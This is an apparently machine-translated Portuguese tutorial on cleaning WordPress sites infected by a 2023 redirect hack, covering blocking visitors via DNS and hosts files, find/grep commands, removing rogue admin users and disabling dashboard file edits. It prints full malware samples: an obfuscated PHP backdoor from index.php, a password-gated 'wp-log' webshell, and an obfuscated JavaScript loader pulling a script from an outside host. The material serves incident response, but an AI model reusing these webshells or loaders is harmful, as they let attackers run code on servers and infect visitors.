WordPress é definitivamente a plataforma mais utilizada CMS (Content Management System) tanto para blogs como para lojas online iniciantes (com o módulo WooCommerce), o que o torna o mais alvo de ataques informáticos (hacking). Uma das operações de hacking mais utilizadas visa redirecionar o site comprometido para outras páginas da web. Redirect WordPress Hack 2023 é um malware relativamente novo que tem o impacto de redirecionar todo o site para páginas de spam ou que, por sua vez, pode infectar os computadores dos usuários.

Se o seu site desenvolvido em WordPress for redirecionado para outro site, provavelmente é vítima do já famoso hack de redirecionamento.

Neste tutorial você encontrará as informações necessárias e dicas úteis para desvírus de um site infectado com um redirecionamento WordPress Hack (Virus Redirect). Através dos comentários você pode obter informações adicionais ou pedir ajuda.

Detecção de vírus que redireciona sites WordPress

Uma diminuição repentina e injustificada do tráfego do site, uma diminuição do número de encomendas (no caso das lojas online) ou das receitas publicitárias são os primeiros sinais de que algo está errado. Detecção “Redirect WordPress Hack 2023” (Redirecionamento de vírus) também pode ser feito “visual” quando você abre o site e é redirecionado para outra página da web.

Por experiência própria, a maioria dos malwares da web são compatíveis com navegadores de internet: Chrome, Firefox, Edge, Opera. Se você é usuário de Mac, esses vírus não são muito visíveis no navegador Safari. O sistema de segurança do Safari bloqueia silenciosamente esses scripts maliciosos.

O que fazer se você tiver um site infectado com Redirect WordPress Hack

Espero que o primeiro passo seja não entrar em pânico ou excluir o site. Mesmo os arquivos infectados ou com vírus não devem ser excluídos inicialmente. Eles contêm informações valiosas que podem ajudá-lo a entender onde está a violação de segurança e o que afetou o vírus. Modus operandi.

Feche o site ao público.

Como você fecha um site de vírus aos visitantes? O mais fácil é usar o gerenciador de DNS e deletar seu IP para “UM” (nome de domínio) ou defina um IP inexistente para ele. Assim, os visitantes do site estarão protegidos contra esse hack de redirecionamento do WordPress que pode levá-los a vírus ou páginas de SPAM.

Se você usar CloudFlare como gerente de DNS, você faz login em sua conta e exclui registros DNS “A” para o nome de domínio. Assim, o domínio afetado pelo vírus permanecerá sem IP, não podendo mais ser acessado pela Internet.

Copie o IP do site e faça “rota” para que somente você possa acessá-lo. Do seu computador.

Como você altera o IP real de um site em computadores Windows?

O método é frequentemente usado para bloquear o acesso a determinados sites editando o arquivo “anfitriões”.

1. Abra o Bloco de Notas ou outro editor de texto (com direitos de administrador) e edite o arquivo “hosts“. Está localizado em:

C:\Windows\System32\drivers\etc\hosts

2. No arquivo “anfitriões” adicionar “rota” ao IP real do seu site. IP excluído acima do gerenciador DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Salve o arquivo e acesse o site no navegador.

Se o site não abrir e você não tiver feito nada de errado no arquivo “anfitriões”, provavelmente é um cache DNS.

Para limpar o cache DNS em um sistema operacional Windows, abra o Prompt de Comando, onde você executa o comando:

ipconfig /flushdns

Como você altera o IP real de um site em computadores Mac/MacBook?

Para usuários de Mac, é um pouco mais simples alterar o IP real de um site.

1. Abra o utilitário Terminal.

2. Execute a linha de comando (requer senha do sistema para executar):

sudo nano /etc/hosts

3. Assim como nos computadores Windows, adicione o IP real do domínio.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Salve as alterações. Ctrl+X (y).

Depois que você fez “rota”, você é a única pessoa que pode acessar o site infectado com Redirect WordPress Hack.

Site de backup completo – Arquivos e banco de dados

Mesmo que esteja infectado com “redirecionar hack do WordPress”, a recomendação é fazer um backup geral de todo o site. Arquivos e banco de dados. Possivelmente você também pode salvar uma cópia local de ambos os arquivos de public / public_html bem como o banco de dados.

Identificação de arquivos usados ​​por vírus e modificados pelo Redirect WordPress Hack 2023

Os principais arquivos de destino do WordPress Eu sou index.php (na raiz), header.php, Assim, index.php e footer.php do tema WordPress ativo. Verifique manualmente esses arquivos e identifique códigos maliciosos ou scripts de malware.

Em 2023, um vírus do tipo “Redirecionar hack do WordPress” colocar index.php um código do formato:

(Eu não recomendo executar esses códigos!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Decodificado, isso malware de script é basicamente a consequência da infecção do site WordPress. Não é o script por trás do malware, é o script que torna possível redirecionar a página infectada. Se decodificarmos o script acima, obteremos:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Para identificar todos os arquivos do servidor que contém esse código é bom ter acesso SSH ao servidor para executar linhas de comando de verificação e gerenciamento de arquivos no Linux.

Relacionado: Como descobrir se o seu blog está infectado ou não, com a ajuda da Pesquisa Google. (Vírus WordPress)

Abaixo estão dois comandos que são definitivamente úteis para identificar arquivos modificados recentemente e arquivos que contêm um determinado código (string).

Como você vê os arquivos PHP alterados nas últimas 24 horas ou em outro período no Linux?

Comando “find” é muito simples de usar e permite customizar para definir o período de tempo, o caminho em que é feita a busca e o tipo de arquivos.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Na saída você receberá informações sobre a data e hora em que o arquivo foi modificado, as permissões de gravação/leitura/execução (chmod) e a qual grupo/usuário ele pertence.

Se quiser verificar há mais dias, altere o valor “-mtime -1” ou usar “-mmin -360” por minutos (6 horas).

Como procurar um código (string) dentro de arquivos PHP, Java?

Linha de comando “encontrar” que você pode usar para encontrar rapidamente todos os arquivos PHP ou Java que contêm um determinado código é o seguinte:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

O comando irá pesquisar e exibir os arquivos .php e .js que contém “uJjBRODYsU“.

Com a ajuda dos dois comandos acima você descobrirá facilmente quais arquivos foram modificados recentemente e quais contêm código de malware.

Remove código malicioso de arquivos modificados sem comprometer o código correto. No meu cenário, o malware foi colocado antes de abrir <head>.

Ao executar o primeiro comando “encontrar” é bem possível que você também descubra novos arquivos no servidor, que não são do WordPress e não foram colocados lá por você. Arquivos pertencentes ao vírus Redirect WordPress Hack.

No cenário que investiguei, shapefiles apareceram no servidor “wp-log-nOXdgD.php“. Estes são arquivos “geração” que também contém código de malware usado pelo vírus de redirecionamento.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

O propósito dos arquivos de tipo “wp-log-*” é espalhar o vírus de redirecionamento para outros sites hospedados no servidor. É um tipo de código de malware “webshell” composto por um seção básica (em que algumas variáveis ​​criptografadas são definidas) e o seção de execução através do qual o invasor tenta carregar e executar um código malicioso no sistema.

Se houver uma variável POST nomeado ‘bh‘ e seu valor criptografado MD5 é igual a “8f1f964a4b4d8d1ac3f0386693d28d03“, então o script parece escrever o conteúdo criptografado base64 de outra variável nomeada ‘b3‘ em um arquivo temporário e tenta incluir esse arquivo temporário.

Se houver uma variável POST ou GET nomeado ‘tick', o script responderá com o valor MD5 da corda “885“.

Para identificar todos os arquivos no servidor que contêm este código, escolha uma string que seja comum e execute o comando de “find” (semelhante ao acima). Exclua todos os arquivos que contêm este código de malware.

Vulnerabilidade de segurança explorada por hack de redirecionamento do WordPress

Muito provavelmente este vírus de redirecionamento chega via explorando o usuário administrador do WordPress ou identificando um plug-in vulnerável que permite adicionar usuários com privilégios de administrador.

Para a maioria dos sites construídos na plataforma WordPress é possível editando arquivos de tema ou pluginda interface de administração (Dashboard). Assim, uma pessoa mal-intencionada pode adicionar código de malware aos arquivos do tema para gerar os scripts mostrados acima.

Um exemplo desse código de malware é este:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificado no cabeçalho do tema WordPress, imediatamente após abrir a tag <head>.

É bastante difícil decifrar esse JavaScript, mas é óbvio que ele consulta outro endereço da web de onde provavelmente busca outros scripts para criar os arquivos “wp-log-*” sobre o qual falamos acima.

Encontre e exclua este código de todos os arquivos PHP afetado.

Pelo que eu sabia, esse código era adicionado manualmente por um novo usuário com privilégios administrativos.

Portanto, para evitar a adição de código de malware do Dashboard, é melhor desabilitar a opção de editar Temas/Plugins do WordPress no Dashboard.

Edite o arquivo wp-config.php e adicione as linhas:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Depois de fazer essa alteração, nenhum usuário do WordPress poderá editar arquivos no Dashboard.

Verifique usuários com função de administrador

Abaixo está uma consulta SQL que você pode usar para procurar usuários administradores na plataforma WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Esta consulta retornará todos os usuários da tabela wp_users quem atribuiu a função de administrador. A consulta também é feita para a tabela wp_usermeta para pesquisar a meta ‘wp_capabilities', que contém informações sobre funções de usuário.

Outro método é identificá-los de: Dashboard → Users → All Users → Administrator. No entanto, existem práticas pelas quais um usuário pode ficar oculto no painel Dashboard. Então, a melhor maneira de ver os usuários “Administrador” do WordPress é o comando SQL acima.

No meu caso, identifiquei o usuário pelo nome no banco de dados “wp-import-user“. Bastante sugestivo.

Também aqui você pode ver a data e hora em que o usuário WordPress foi criado. O ID do usuário também é muito importante porque pesquisa os logs do servidor. Desta forma você pode ver toda a atividade deste usuário.

Excluir usuários com função de administrador que você não sabe, então alterar senhas para todos os usuários administrativos. Editor, Autor, Administrador.

Alterar a senha do usuário do banco de dados SQL do site afetado.

Após seguir essas etapas, o site pode ser reiniciado para todos os usuários.

Tenha em mente, entretanto, que o que apresentei acima é um dos talvez milhares de cenários em que um site está infectado com Redirect WordPress Hack em 2023.

Se o seu site foi infectado e você precisa de ajuda ou tem alguma dúvida, a seção de comentários está aberta.